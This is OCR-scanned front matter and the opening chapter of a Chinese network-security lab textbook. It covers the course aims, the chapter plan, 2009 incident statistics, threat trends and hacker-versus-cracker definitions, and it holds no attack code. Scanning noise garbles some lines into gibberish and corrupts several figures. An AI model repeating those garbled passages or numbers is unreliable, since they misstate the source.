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内 容 简 介 
本 书 基于 网 络 安全 体系 结构 ,选择 最 新 的 网 络 安全 实用 软件 和 技术 ,在 基本 的 网 络 安全 实用 技术 和 
理论 基础 上 ,系统 地 讲授 网 络 分 析 、 远 程控 制 技术 .SSL VPN 技术 ,防火 墙 技术 、 入 侵 检 测 技术 和 虚拟 蜜 
网 技术 等 网 络 安全 实验 内 容 。 本 书 不 仅 介绍 网 络 安全 体系 结构 基本 理论 和 方法 ,还 设计 了 多 个 应 用 工 
具 实 例 。 通 过 Sniffer 分 析 软 件 pcAnywhere 远程 控制 程序 、Snort 入 侵 检测 系统 以 及 Honeywall 蜜 网 架 
构 等 实验 用 例 的 训练 ,学 生 可 以 建立 网 络 信息 安全 的 体系 概念 ,了 解 网 络 协议 .数据 包 结 构 、 网 络 安全 管 
理 技术 等 在 计算 机 系统 中 的 重要 性 。 
本 书 取材 新 颖 ,采用 实例 教学 的 组 织 形式 ,内 容 由 浅 入 深 , 循 序 渐 进 。 书 中 给 出 了 大 量 设 计 实 例 及 
扩展 方案 ,不 仅 可 以 作为 教学 内 容 进行 学 习 , 而 且 部 分 内 容 还 具有 工程 实践 价值 。 本 书 可 作为 高 等 院 校 
计算 机 类 电子 类 和 自动 化 类 等 有 关 专 业 的 教材 和 参考 书 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ， 无 标签 者 不 得 销售 。 
版 权 所 有 ， 侵 权 必 究 。 侵 权 举 报 电话 : 010-62782989 13701121933 


图 书 在 版 编目 (CIP) 数据 


网 络 安 全 实验 教程 / 孙 建 国 , 张 国 印 编著 . 一 北京 : 清华 大 学 出 版 社 ，2011.7 
(计算 机 科学 与 技术 专业 实践 系列 教材 ) 
ISBN 978-7-302-25530-7 


I. OM П. Of ©- DH. 计算 机 网 络 一 安全 技术 一 高 等 学 校 一 教材 
WV. OTP393. 08 


中 国 版 本 图 书馆 CIP 数据 核 字 (2011) 第 087937 号 
责任 编辑 : КК ЕЖЕ 


责任 校对 : HIA 

责任 印 制 : 李 红 英 

出 版 发 行 : 清华 大 学 出 版 社 地 址 : 北京 清华 大 学 学 研 大 厦 А 座 
http://www. tup. com. cn 邮 编 : 100084 
社 总 机 : 010-62770175 邮 购 : 010-62786544 


投稿 与 读者 服务 : 010-62795954 ,jsjjc@tup. tsinghua. edu. cn 
KR 量 反 fR: 010-62772015 ,zhiliang@tup. tsinghua. edu. cn 


印 刷 者 : 北京 富 博 印刷 有 限 公 司 

装 订 者 : 北京 市 密云 县 京 文 制 本 装订 厂 

经 销 : 全 国 新 华 书店 

开 本 : 185X260 印 张 : 11.5 字 数 : 262 FF 

版 ”次 : 2011 年 7 月 第 1 版 印 Ж: 2011 年 7 月 第 1 次 印刷 
印 数 : 1 一 3000 

定 价 : 19. 50 元 

产品 编号 : 038583-01 


qi ® 会 


等 教育 “十 一 五 ”国家 级 规划 教材 


计算 机 科学 与 技术 专业 实践 系列 教材 


-— 
= 


通 高 


ate 
[=] 


4K 


А 


rR 


RV AL 


陈 向 群 


编 委 委员 : 


й 富 


1. 写作 背景 

目前 ,关于 我 国 高 等 教育 的 信息 安全 学 科 和 专业 方向 设置 问题 受到 非常 大 的 关注 。 
对 于 信息 安全 专业 的 本 科 生 教育 而 言 , 其 基本 的 培养 方案 .课程 设置 和 教学 大 纲 都 需要 根 
据 新 的 形势 进行 变革 ,保密 与 信息 安全 专业 方向 也 在 积极 的 进行 准备 。 

在 新 形势 下 ,对 于 信息 安全 专业 人 才 的 培养 标准 是 : 具有 宽厚 的 理工 基础 ,掌握 信息 
科学 和 管理 科学 专业 基础 知识 ,系统 地 掌握 信息 安全 与 保密 专业 知识 ,具有 和 良好 的 学 习 能 
力 ,分析 与 解决 问题 能 力 .实践 与 创新 能 力 。 特 别 是 在 能 力 方面 ,要 求 信 息 安全 专业 的 学 
生 能 够 做 到 : 具有 设计 和 开发 信息 安全 与 防范 系统 的 基本 能 力 ;具有 获取 信息 和 运用 知 
识 解决 实际 问题 的 能 力 ; 具 有 良好 的 专业 实践 能 力 和 基本 的 科研 能 力 。 

实践 学 时 的 设置 不 仅 起 到 加 深 学 生理 论 课 所 学 知识 的 作用 ,还 起 到 培养 学 生 建立 理 
论 与 实践 联系 并 解决 实际 问题 的 能 力 的 作用 ,这 对 于 实现 当前 的 高 等 教育 改革 目标 ,提高 
毕业 生 综 合 素质 具有 重要 的 意义 。 但 是 受 实验 设备 所 限 , 各 课程 的 实验 环节 较 分 散 , 分 布 
在 不 同 的 实验 平台 或 实验 课程 中 ,缺乏 连贯 性 和 整体 性 。 网 络 安全 实践 环节 的 设立 ,是 对 
计算 机 网 络 .现代 密码 学 .信息 系统 安全 、 网 络 安全 、 软 件 安全 .信息 安全 管理 等 专业 核心 
课程 的 有 效 支撑 。 

本 教材 的 编写 思路 是 : 从 网 络 安全 的 体系 架构 中 确定 需要 重点 讲授 和 考核 的 内 容 ， 
针对 具体 内 容 选择 最 具 代 表 性 的 实用 型 软件 工具 或 主流 技术 ,开展 具有 基础 实验 和 扩展 
实验 相 结合 的 实验 内 容 , 既 满足 于 日 常 的 实验 教学 活动 ,又 能 够 促进 学 生 创 新 实践 能 力 的 
培养 和 提高 。 

2. 本 书 特点 

本 书 兼顾 高 等 学 校 理论 教学 需要 与 培养 学 生 实践 能 力 的 需求 ,借鉴 国外 名 校 在 信息 
安全 专业 课程 设置 及 相关 课程 内 容 安排 ,组 织 本 教程 的 相关 理论 知识 及 实验 用 例 设 计 , 力 
争 理 论 详尽 .用 例 科 学 .指导 到 位 。 配 合 高 等 学 校 的 计算 机 网 络 、 现 代 密 码 学 .信息 系统 安 
全 、 网 络 安全 .软件 安全 、 信 息 安全 管理 等 课程 的 实践 教学 环节 ,突出 实用 性 ,所 有 实验 可 
操作 性 强 ,与 实践 结合 紧密 。 本 书 不 仅 介绍 网 络 安全 的 核心 理论 和 主要 技术 ,更 着 眼 于 介 
绍 在 网 络 安全 管理 和 实践 过 程 中 如 何 运用 系统 软件 ,支撑 和 维护 网 络 健康 运行 。 

本 书 可 作为 信息 安全 专业 及 相关 专业 “计算 机 网 络 "“ 现 代 密 码 学 "“ 信 息 系统 安 
全 ”“ 网 络 安 全 ” “信息 安全 管理 ”等 课程 的 实践 教材 , 书 中 的 全 部 实验 示例 都 经 过 精心 
的 设计 和 完全 的 调试 ,可 以 放心 使 用 。 

3. 内 容 安排 

本 书 的 内 容 安排 如 下 : 

省 第 1 章 介绍 网 络 安全 的 基本 概念 和 发 展 历程 ,以 及 网 络 安全 与 信息 安全 的 密切 联 

系 ,并 介绍 网 络 安全 实验 的 特点 和 基本 要 求 。 


-M-e 


aP 2 章 介 绍 网 络 安全 的 研究 意义 和 研究 内 容 , 主 要 包括 密码 学 、 防 火 墙 技术 、 网 络 
入 侵 检测 ,数据 备份 与 容 灾 、 防 病毒 技术 ,还 介绍 了 网 络 管理 规范 。 

#3 章 介绍 网 络 分 析 实 验 的 原理 和 技术 ,重点 介绍 基于 Sniffer Pro 嗅 探 软件 的 数 
据 包 捕获 网络 监 视 等 功能 ,并 增加 对 多 种 网 络 协议 进行 嗅 探 分 析 的 扩展 实验 
环节 。 

名 第 4 章 以 pcAnywhere 远程 控制 软件 为 主要 工具 ,介绍 其 安装 和 使 用 方法 ,讲解 主 
控 端 ,被 控 端 的 配置 方法 ,并 介绍 远程 文件 控制 的 操作 方式 。 

名 第 5 章 介 绍 SSL VPN 概念 ,以 及 VPN 服务 配置 与 使 用 的 操作 方法 。 

名 第 6 童 介绍 防火 墙 技术 ,并 结合 天 网 防火 墙 和 瑞星 防火 墙 ,讲述 防火 墙 使 用 及 配 
置 方法 。 

和 第 7 章 介绍 人 侵 检测 技术 ,重点 讲述 Snort 入 侵 检测 工具 的 使 用 方法 。 

名 第 8 章 讨论 对 虚拟 蜜 网 系统 的 实用 性 意义 ,介绍 虚拟 蜜 网 的 搭建 与 攻击 分 析 
Jrik. 
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Я 1з 网 络 安全 实验 概述 


1.1 引 论 


1.1.1 网 络 安全 现状 及 发 展 


网 络 安全 是 指 网 络 系统 的 软件 .硬件 及 其 存储 的 数据 处 于 保护 状态 ,网 络 系统 不 会 由 
于 偶然 的 或 者 恶意 的 冲击 而 受到 破坏 ,网 络 系统 能 够 连续 可 靠 地 运行 。 网 络 安全 是 一 门 
涉及 计算 机 科学 、 网 络 技术 .通信 技术 、 密 码 技术 、 信 息 安 全 技术 .应 用 数学 ,信息论 等 多 研 
究 领 域 的 综合 性 学 科 。 概 括 地 说 ,凡是 涉及 网 络 系统 的 保密 性 、 完 整 性 .可 用 性 和 可 控 性 
的 相关 技术 和 理论 都 是 网 络 安全 的 研究 内 容 。 


1.1.1.1 网 络 安 全 问题 

随 着 计算 机 技术 和 互联 网 技术 的 飞速 发 展 ,数字 化 信息 已 经 成 为 社会 发 展 的 重要 资 
源 。 例 如 ,数字 化 城市 .数字 化 国防 的 建设 都 需要 大 量 网 络 信 息 支 持 。 快 速 发 展 的 各 类 网 
络 将 这 些 数字 信息 紧密 地 联系 在 一 起 ,与 之 相伴 的 是 随时 可 能 发 生 的 各 类 安全 问题 ,列举 
ШЕ: 

。 Ay Hz ^e FR] RE Sn fei БАЙ ‚г e 03 HC ЖЕ ЖЕТИ E SEDE RE o 

。 设备 安全 问题 ,如 自然 灾害 .设计 缺陷 .电磁 辐射 。 

2010 4E 3 月 ,国家 计算 机 网 络 应 急 处 理 协调 中 心 发 布 了 《2009 年 中 国 网 民 网 络 信息 
安全 状况 调查 报告 ), 报 告 对 我 国 的 网 络 安全 现状 进行 了 总 体 分 析 , 突 出 表现 概括 为 : 

。 国内 半数 网 民 无 法 区 分 各 类 安全 软件 的 异同 。 

。 2009 年 ,半数 网 民 曾 遭遇 网 络 安全 事件 ,网 络 下 载 和 浏览 成 为 病毒 和 木马 传播 的 

主要 渠道 。 

。 网 络 安全 问题 对 网 民 造 成 的 损失 主要 是 时 间 成 本 ,其 次 才 是 经 济 方面 的 损失 。 

。 2009 年 ,网 民 处 理 安全 事件 所 支出 的 服务 费用 共计 153 亿 元 人 民 币 。 

。 网 络 安全 事件 造成 的 虚拟 财产 损失 成 为 网 络 安全 事件 的 主要 经 济 损失 之 一 ,虚拟 

财产 保护 亟待 加 强 。 

。 2009 年 网 络 安全 事件 受 关注 度 比 以 往 大 幅 提 升 。 

。 网 民 对 网 络 的 安全 感 降低 ,提供 网 上 个 人 信息 比 以 往 更 加 慎重 。 

。 VE 2100 万 网 民 缺 乏 密码 设置 方面 的 保护 意识 。 

* 99% 的 网 民 对 于 个 人 计算 机 均 采 取 一 定 的 防范 措施 。 

* 近 七 成 网 民 能 够 意识 到 个 人 网 络 安 全 问题 会 波及 公共 网 络 及 他 人 的 安全 。 

随 着 互联 网 的 发 展 , 各 种 安全 问题 层出不穷 ,互联 网 上 草 延 和 传播 的 恶意 程序 呈 几 何 
级 数 递增 。 国 家 计算 机 网 络 应 急 处 理 协调 中 心 的 调查 结果 显示 ,2009 4E 52 70 НУ I] E 
遭遇 过 网 络 安全 事件 。 遭 遇 过 网 络 安全 事件 的 网 民 一 般 是 通过 很 直观 的 方式 来 判断 遭受 
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攻击 的 ,通常 是 在 使 用 计算 机 的 过 程 中 发 现 异常 。71.9% 的 网 民 发 现 浏览 器 配置 被 修改 ， 
50.1% 的 网 民 发 现 网 络 系统 无 法 使 用 ,45% 的 网 民 发 现 数 据 、 文 件 被 损坏 ,41. 5% 的 网 民 
发 现 操作 系统 崩 演 ,而 发 现 QQ 密码 MSN 密码 .邮箱 账号 曾经 被 盗 的 网 民 占 32. 396. АД 
图 1.1 所 示 。 


浏览 器 配置 被 修改 
网 络 系统 无 法 使 用 
数据 、 文 件 损坏 
PRE RSH TL 
QQ 密码 、MSN 密 码 、 邮 箱 账号 被 盗 
网 游 密码 、 账 号 密码 被 次 
受到 远程 控制 
计算 机 运行 慢 
没有 造成 危害 
网 银 密 码 、 账 号 被 盗 0 2.5% 
网 络 系统 故障 ， 运 行 慢 [17% 
其 他 2.0% 
0% 20% 40% 60% 80% 
数据 来 源 : CNNIC 和 CNCERT 网 络 在 线 调 查 (2009 年 12 月 ) 
图 11 网 络 安全 事件 带 来 的 危害 


71.9% 


对 网 民用 于 处 理 网 络 安 全 事件 支出 的 费用 ,国家 计算 机 网 络 应 急 处 理 协调 中 心 进行 
统计 显示 : 2009 年 ,网 民 处 理 安全 事件 所 支出 的 服务 费用 共计 153 亿 元 人 民 币 ;在 实际 产 
生 费 用 的 人 群 中 , 人均 费 用 约 588. 9 元 ;费用 在 100 元 及 以 下 的 占 51. 2%; 如 按 国内 
3.84 亿 网 民 计 算 , 人 均 处 理 网 络 安全 事故 的 费用 约 为 39. 9 元 ,如 图 1. 2 所 示 。 
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数据 来 源 : CNNIC 和 CNCERT 网 络 在 线 调 查 (20095129) 
图 12 网 络 安全 事件 带 来 的 直接 经 济 损失 情况 


中 国 的 网 络 安全 技术 在 近 几 年 得 到 快速 的 发 展 ,这 一 方面 得 益 于 从 中 央 到 地 方 政府 
的 广泛 重视 , 另 一 方面 因为 网 络 安全 问题 日 益 突 出 ,网 络 安全 企业 不 断 研发 最 新 安全 技 
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AR ,不 断 推出 满足 用 户 需求 ,具有 时 代 特 色 的 安全 产品 ,促进 了 网 络 安全 技术 的 发 展 。 


1.1.1.2 网 络 安全 技术 

网 络 安全 技术 主要 包括 防火 墙 技术 .入 侵 检 测 技术 以 及 防 病毒 技术 。 这 三 种 网 络 安 
全 技术 是 针对 数据 、 单 一 系统 以 及 软 硬 件 本 身 的 安全 保障 ,具体 原因 包括 三 个 方面 : 

首先 ,从 用 户 角 度 来 看 ,虽然 安装 了 防火 墙 ,但 是 仍 避 免不了 蠕虫 .垃圾 邮件 、 病 毒 以 
及 拒绝 服务 攻击 等 网 络 危害 事件 的 发 生 。 

其 次 ,入 侵 检测 产品 在 提前 预警 方面 存在 不 足 , 对 于 危害 程序 和 代码 的 精确 定位 以 及 
系统 全 局 管理 能 力 还 有 很 大 的 提升 空间 。 

最 后 ,虽然 很 多 用 户 在 系统 终端 上 都 安装 了 防 病毒 产品 ,但 是 内 网 安全 问题 仍然 突 
出 ,尤其 是 安全 策略 的 执行 .外 来 非法 侵入 .补丁 管理 以 及 操作 行为 规定 等 方面 。 

目前 来 看 ,网络 安全 的 防护 重点 将 集中 在 信息 语义 范畴 和 网 络 行为 。 


1.1.1.3 网 络 安全 发 展 趋势 

在 网 络 混合 攻击 时 代 ,功能 单一 的 防火 墙 系统 无 法 满足 业务 的 需要 ,防火墙 技术 必须 
具备 多 种 安全 功能 ,如 基于 应 用 协议 层 防 御 , 低 误 报 率 检测 ,高 可 靠 性 ,高 性 能 的 平台 和 统 
一 组 件 化 管理 技术 等 ,由 此 ,UTM(unified threat management, 统 一 威胁 管理 ) 技 术 应 运 
而 生 。 

UTM 在 统一 的 产品 管理 平台 下 , 集 防 火 墙 \VPN、 网 关 防 病毒 、IPS、 拒 绝 服务 攻击 等 
众多 产品 功能 于 一 体 ,实现 了 多 种 防御 功能 。 向 UTM 方向 演进 将 是 防火 墙 的 发 展 趋势 。 

UTM 设备 应 具有 以 下 特点 : 

COD 网 络 安全 协议 层 防御 。UTM 设备 主要 针对 IP 地 址 、 端 口 等 静态 信息 进行 防护 
和 控制 ,除了 传统 的 访问 控制 外 ,还 需 对 垃圾 邮件 .拒绝 服务 .黑客 攻击 等 外 部 威胁 进行 综 
合 检测 和 主动 防御 。 

(2) 通过 分 类 检测 技术 降低 误 报 率 。 串 联接 入 的 网 关 设 备 一 旦 误 报 过 高 ,将 会 严重 
影响 系统 的 正常 服务 ,给 用 户 带 来 灾难 性 的 后 果 。IPS 理念 在 20 世纪 90 年 代 就 被 提出 ， 
但 是 目前 IPS 部 署 非 常 有 限 ,影响 其 部 署 的 一 个 重要 问题 就 是 误 报 率 过 高 。 分 类 检测 技 
术 可 以 大 幅度 降低 误 报 率 , 针 对 不 同 的 攻击 类 型 ,采取 不 同 的 检测 技术 ,比如 防御 拒绝 服 
务 攻击 、 防 蠕虫 和 黑客 攻击 、 防 垃圾 邮件 攻击 等 ,从 而 显著 降低 误 报 率 。 

G) 高 可 靠 性 、 高 性 能 的 硬件 支撑 平台 。 

(4) 一 体 化 管理 。UTM 设备 具有 能 够 统一 控制 和 管理 的 平台 ,使 用 户 能 够 有 效 地 管 
理 。 设 备 平 台 可 以 实现 标准 化 并 具有 可 扩展 性 ,用 户 可 在 统一 的 平台 上 进行 组 件 管理 , 同 
时 ,一 体 化 管理 也 能 消除 信息 产品 之 间 由 于 无 法 沟通 而 带 来 的 信息 孤岛 ,从 而 在 应 对 各 种 
各 样 攻击 威胁 的 时 候 , 更 好 地 保障 用 户 的 网 络 安全 。 


1.1.1.4 网 络 威胁 趋势 分 析 

在 信息 网 络 普及 的 时 代 , 信 息 安 全 威胁 随时 存在 , 且 不 断 增加 ,信息 网 络 安全 性 正 逐 
步 得 到 人 们 的 重视 。 在 当前 复杂 的 网 络 应 用 环境 下 ,信息 网 络 所 面临 的 安全 形势 异常 严 
峻 。 来 自 中 国电 子 商务 研究 中 心 的 报告 列举 了 如 下 严重 的 网 络 威胁 。 


1. 垃圾 邮件 和 网 络 欺骗 

社交 网 站 成 为 网 络 安全 的 重 灾区 。2010 年 ,Koobface 蠕虫 等 安全 问题 对 社交 网 站 用 
户 形成 巨大 威胁 。 从 这 些 软 件 攻击 过 程 来 看 , 正 逐 步 由 攻击 系统 、 窍 取 资 料 的 被 动 方 式 转 
变 为 主动 攻击 模式 。 安 全 专家 认为 ,恶意 软件 作者 正在 拓展 攻击 范围 ,把 恶意 软件 植 人 社 
交 网 站 应 用 层 内 部 ,攻击 者 可 以 毫 无 限制 地 窃取 用 户 的 资料 和 登录 密码 。 

思科 在 其 2009 年 (年 度 安全 报告 ) 中 揭示 了 社交 媒体 (尤其 是 社交 网 络 ) 对 网 络 安 全 
的 影响 ,并 探讨 了 个 体 本 身 在 为 网 络 犯罪 创造 机 会 方面 所 起 的 关键 作用 。 社 交 网 络 已 经 
成 为 网 络 犯 罪 的 导 火 索 ,网 站 成 员 过 于 信任 社区 伙伴 ,根本 没有 采取 任何 阻止 恶意 软件 和 
计算 机 病毒 的 预防 措施 。 这 些 不 良 用 户 行为 以 及 系统 、 操 作 漏 洞 结合 在 一 起 会 具有 不 可 
估量 的 破坏 性 ,将 大 幅 增加 网 络 安全 风险 。 

2. 云 计 算 为 网 络 犯罪 提供 了 新 的 技术 

云 计 算 在 2009 年 取得 了 重大 的 发 展 , 但 应 该 清醒 地 认识 到 : 市 场 的 快速 发 展会 牺牲 
一 定 的 安全 性 ,攻击 者 今后 将 把 更 多 的 时 间 用 于 挖掘 云 计算 服务 提供 商 的 API( 应 用 编程 
接口 ) 漏 洞 方面 。 

随 着 越 来 越 多 的 IT 功能 通过 云 计算 来 提供 ,网 络 犯罪 也 顺应 了 这 一 趋势 。 网 络 攻 
击 者 和 黑客 也 将 效仿 企业 做 法 使 用 基于 云 计算 的 工具 ,以 便 更 有 效率 地 部 署 远程 攻击 , 甚 
至 借 此 大 幅 拓 展 攻 击 范围 。 

对 于 云 计算 将 被 黑客 所 利用 这 个 严峻 的 问题 ,各 大 安全 公司 都 把 精力 放 在 与 云 计 算 
相关 的 安全 服务 上 ,提供 加 密 、 目 录 管 理 . 反 垃圾 邮件 、 恶 意 程序 扫描 等 各 类 解决 方案 。 据 
悉 , 著 名 安全 评测 机 构 VB100 号 召 安全 行业 联合 起 来 ,组 成 一 个 对 抗 恶意 程序 的 共同 体 ， 
分 享 技术 和 资源 。 

3. 智能 手机 安全 问题 愈 发 严重 

随 着 移动 通信 业务 应 用 的 不 断 增多 ,智能 设备 的 受 攻击 范围 也 在 不 断 扩大 ,移动 通信 
安全 所 面临 的 问题 将 会 越 来 越 严 重 。 目 前 ,已 经 出 现 了 手机 蠕虫 病毒 .智能 手机 盗号 木 
马 ,虽然 这 些 病毒 还 不 能 自我 传播 ,还 需要 依靠 计算 机 来 传播 ,但 是 可 以 预计 到 ,具有 自我 
传播 能 力 的 病毒 势必 出 现 ,将 严重 威胁 各 类 移动 通信 终端 设备 。 

总 体 而 言 , 安 全 专家 认为 , 随 着 智能 手机 业务 范围 的 拓 广 ,用 户 利用 手机 来 处 理 银行 
交易 .社交 网 站 和 其 他 业务 ,黑客 将 越 来 越 关 注 这 一 攻击 领域 。 

4. 搜索 引擎 成 为 黑客 的 全 新 赢利 方式 

黑客 不 断 寻找 新 的 方法 借助 钓鱼 网 站 吸引 用 户 , 利 用 搜索 引擎 优化 技术 展开 攻击 便 
是 其 中 的 一 种 方法 。 谷 歌 和 必 应 (Bing) 对 实时 搜索 的 支持 也 将 吸引 黑客 进一步 提升 相关 
技术 。 作 为 一 种 攻击 渠道 ,搜索 引擎 是 非常 理想 的 选择 ,因为 用 户 通常 都 非常 信任 搜索 引 
擎 ,对 于 排 在 前 几 位 的 搜索 结果 更 是 没有 任何 怀疑 ,这 就 给 了 黑客 可 乘 之 机 ,黑客 可 以 利 
用 搜索 引擎 对 用 户 发 动 攻击 。 

5s.“ 僵 尸 网 络 ? 继 续 独 狂 

所 谓 僵尸 ,是 指 受 恶 意 软件 感染 而 被 犯罪 分 子 远程 操控 的 个 人 计算 机 。 犯 罪 分 子 通 
过 网 络 将 病毒 植 人 成 千 上 万 台 个 人 计算 机 ,实现 大 范围 的 操控 ,犯罪 分 子 们 使 用 这 些 计算 
机 进行 各 种 网 络 犯罪 ,如 垃圾 邮件 发 送 、 服 务 阻 断 攻击 、 网 络 钓鱼 及 非法 主机 攻击 等 ,基本 
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覆盖 了 所 有 网 络 犯罪 行为 。 从 当前 的 网 络 安全 态势 来 看 , 越 来 越 多 的 计算 机 受到 感染 ,而 
被 感染 的 时 间 也 越 来 越 长 了 。 

6. 传统 攻击 方式 再 度 兴起 

IBM X-Force 团队 预计 ,大 规模 蠕虫 攻击 将 再 度 兴起 ,与 此 同时 ,DDoS( 分 布 式 拒绝 
服务 攻击 ) 也 将 重新 成 为 主流 攻击 方式 ,木马 仍 将 占据 主要 地 位 。 

来 自 中 国电 子 商 务 研究 中 心 的 报告 显示 , 据 Websense 的 卢 纳 德 预计 ,电子 邮件 攻击 
也 有 重新 抬头 之 势 。 研 究 人 员 已 经 发 现 ,通过 PDF 等 邮件 附件 发 动 的 攻击 开始 增加 。 他 
说 :“ 恶 意 邮件 攻击 在 2005 年 至 2008 年 期 间 已 经 销声匿迹 。 而 现在 不 知 出 于 何 种 原因 ， 
这 种 攻击 方式 又 青 度 出 现 。” 

从 网 络 威胁 方式 来 看 ,威胁 方式 的 演进 主要 体现 在 如 下 几 个 方面 。 

D 实施 网 络 攻击 的 主体 发 生 了 变化 

实施 网 络 攻 击 的 主要 人 群 正 由 好 奇 心 重 \ 炫 粹 攻 防 能 力 的 兴趣 型 黑客 群 ,向 更 具 犯 罪 
思想 的 顾 利 型 攻击 人 群 过 渡 ,针对 终端 系统 漏洞 实施 "zero-day 攻击 ”和 利用 网 络 攻 击 获 
取经 济 利 益 ,逐步 成 为 主要 趋势 。 其 中 以 僵尸 网 络 .间谍 软 件 为 手段 的 恶意 代码 攻击 ,以 
敲诈 勒索 为 目的 的 分 布 式 拒绝 服务 攻击 ,以 网 络 仿冒 、 网 址 嫁接 、 网 络 动 持 等 方式 进行 的 
在 线 身份 窃取 等 安全 事件 持续 快 增 ,而 针对 P2P、IM 等 新 型 网 络 应 用 的 安全 攻击 也 在 迅 
速 发 展 。 以 “能 猫 烧香 "“ 灰 铅 子 "事件 为 代表 形成 的 黑色 产业 链 ,也 凸显 了 解决 信息 安全 
问题 的 迫切 性 和 重要 性 。 

2) 企业 对 安全 威胁 的 认识 发 生 了 变化 

过 去 ,企业 信息 网 络 安全 的 防护 中 心 一 直 定 位 于 网 络 边界 及 核心 数据 区 ,通过 部 署 各 
种 各 样 的 安全 设备 实现 安全 保障 。 但 随 着 企业 信息 边界 安全 体系 的 基本 完善 ,信息 安全 
事件 仍然 层出不穷 。 对 企业 内 部 人 员 缺 乏 安全 管理 .办 公 时 间 肆 意 上 网 .计算 机 使 用 不 当 
等 都 使 网 络 信息 安全 风险 变 得 更 为 严重 。 

3) 安全 攻击 的 主要 手段 发 生 了 变化 

安全 攻击 的 手段 多 种 多 样 ,典型 的 手段 包含 拒绝 服务 攻击 ,非法 接 和 人 LIP 欺骗 、 网 络 
嗅 探 \, 木 马 攻击 以 及 垃圾 邮件 等 方式 。 随 着 攻击 技术 的 发 展 , 攻 击 手段 正 由 单一 攻击 模式 
向 多 种 攻击 手段 结合 的 复合 性 攻击 发 展 。 结 合 多 种 攻击 手段 的 复合 模式 所 带 来 的 危害 ， 
远 远大 于 单一 模式 的 攻击 , 且 更 加 难以 控制 。 


11.2 黑客 及 黑客 入 侵 技术 


1.1.2.1 黑客 定义 

黑客 是 计算 机 应 用 领域 中 的 一 个 特殊 的 群体 , 随 着 计算 机 系统 被 攻击 报道 的 逐渐 增 
多 ,黑客 越发 成 为 业界 的 关注 焦点 。 黑 客 是 英文 hacker 一 词 的 音译 ,是 指 计算 机 系统 的 
非法 入 侵 者 。 

在 早期 麻 省 理工 学 院 的 校园 倡 语 中 必 黑 客 >"* 有 “恶作剧 ?之 意 , 尤 指 手法 巧妙 、 技 术 高 
明 的 恶作剧 ;在 日 本 《新 黑客 词典 》 中 ,对 黑客 的 定义 是 “喜欢 探索 软件 程序 奥秘 ,并 从 中 增 
长 了 个 人 才干 的 人 ”。 目前 ,黑客 被 准确 界定 为 “以 保护 网 络 为 目的 ,具有 软 硬 件 高 级 知 
识 , 有 能 力 通 过 创新 的 方法 剖析 系统 的 技术 精英 ,他 们 以 侵入 为 手段 找 出 网 络 漏洞 ,进而 
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令 互联 网 络 趋 于 完善 和 安全 ”。 一 般 认为 ,黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 的 实 
验 室 中 ,他 们 热 囊 于 解决 难题 。 

20 世纪 60,70 ER. “黑客 ” 富 于 讲义 , 专 指 那些 独立 思考 、 奉 公 守 法 的 计算 机 爱好 
者 ,这 些 人 智力 超群 ,对 计算 机 技术 全 身心 投入 ,在 他 们 看 来 ,黑客 活动 意味 着 对 计算 机 的 
最 大 潜力 进行 智力 上 的 自由 探索 ,为 计算 机 技术 的 发 展 做 出 巨大 贡献 。 正 是 这 些 黑客 , 倡 
导 了 一 场 个 人 计算 机 革命 ,倡导 了 现行 的 计算 机 开放 式 体系 结构 。 现 在 黑客 使 用 的 入 侵 
计算 机 系统 的 基本 技巧 ,如 破解 口令 (password cracking)、 开 天 窗 (trapdoor)、 走 后 门 
(backdoor) .安放 特洛伊 木马 (Trojan horse) 等 ,都 是 在 这 一 时 期 发 明 的 。 从 事 黑客 活动 
的 经 历 , 成 为 后 来 许多 计算 机 业 巨 子 简历 上 不 可 或 缺 的 一 部 分 。 例 如 ,苹果 公司 创始 人 之 
一 乔布斯 就 是 一 个 典型 的 例子 。 

到 了 20 世纪 80,90 年代, 计算 机 越 来 越 重 要 ,大 型 数据 库 也 越 来 越 多 ,信息 越 来 越 集 
中 在 少数 人 的 手 里 。 黑 客 认为 ,信息 应 共享 而 不 应 被 少数 人 所 垄断 ,于 是 将 注意 力 转移 到 
涉及 各 种 机 密 的 信息 数据 库 上 。 而 这 时 ,计算 机 化 空间 已 私有 化 ,成 为 个 人 拥有 的 财产 ， 
社会 不 能 再 对 黑客 行为 放任 不 管 ,而 必须 采取 行动 ,利用 法 律 等 手段 来 进行 控制 ,黑客 活 
动 受 到 了 打击 。 目 前 ,许多 政府 机 构 已 经 邀请 黑客 为 他 们 检验 系统 的 安全 性 ,甚至 还 请 他 
们 设计 新 的 安保 规程 。 

与 黑客 相对 的 是 骇 客 , 骇 客 是 cracker 的 音译 ,就 是 “破坏 者 ”的 意思 。 骇 客 是 贬义 
的 , 骇 客 具备 广泛 的 计算 机 知识 ,他 们 做 的 事情 更 多 的 是 破解 商业 软件 ,恶意 入侵 别人 的 
网 站 并 造成 损失 ,利用 网 络 漏洞 破坏 网 络 。 

黑客 和 骇 客 的 基本 差异 在 于 ,黑客 是 有 建设 性 的 ,而 骇 客 则 专门 搞 破坏 。 对 于 一 个 黑 
客 来 说 ,学 会 人 侵 和 破解 是 必要 的 ,但 最 主要 的 还 是 编程 。 对 于 一 个 骇 客 来 说 ,他 们 只 追 
求 入 侵 的 快感 ,不 在 乎 技术 ,他 们 不 会 编程 ,不 知道 入 侵 的 具体 细节 。 还 有 一 种 情况 是 试 
图 破解 某 系统 或 网 络 以 提醒 该 系统 所 有 者 的 系统 安全 漏洞 ,这 群 人 往往 被 称 做 “ 白 帽 黑 
客 ?或 “匿名 客 ”(sneaker) 或 红 客 。 许 多 这 样 的 人 是 计算 机 安全 公司 的 雇员 ,并 在 完全 合 
法 的 情况 下 攻击 某 系 统 。 


1.1.2.2 黑客 活动 

黑客 的 主要 活动 内 容 包 括 : 

COD 作为 一 个 黑客 ,在 找到 系统 漏洞 并 侵入 的 时 候 , 往 往 都 会 很 小 心地 避免 造成 麻 
烦 , 并 且 善 意 地 提醒 系统 管理 员 ,但 是 在 这 一 过 程 中 有 许多 因素 都 是 未 知 的 ,没有 人 能 断 
定 最 终 会 是 什么 结果 ,因此 一 个 好 的 黑客 是 不 会 随便 攻击 个 人 用 户 及 站 点 的 。 

(2) 编写 一 些 有 用 的 开源 软件 ,这 些 软件 都 是 免费 的 .公开 的 。 

(3) 帮助 别 的 黑客 测试 和 调试 软件 。 

(4) 黑客 们 都 以 探索 漏洞 与 编写 程序 为 乐 ,在 黑客 的 圈子 里 ,有 许多 其 他 事情 可 做 ， 
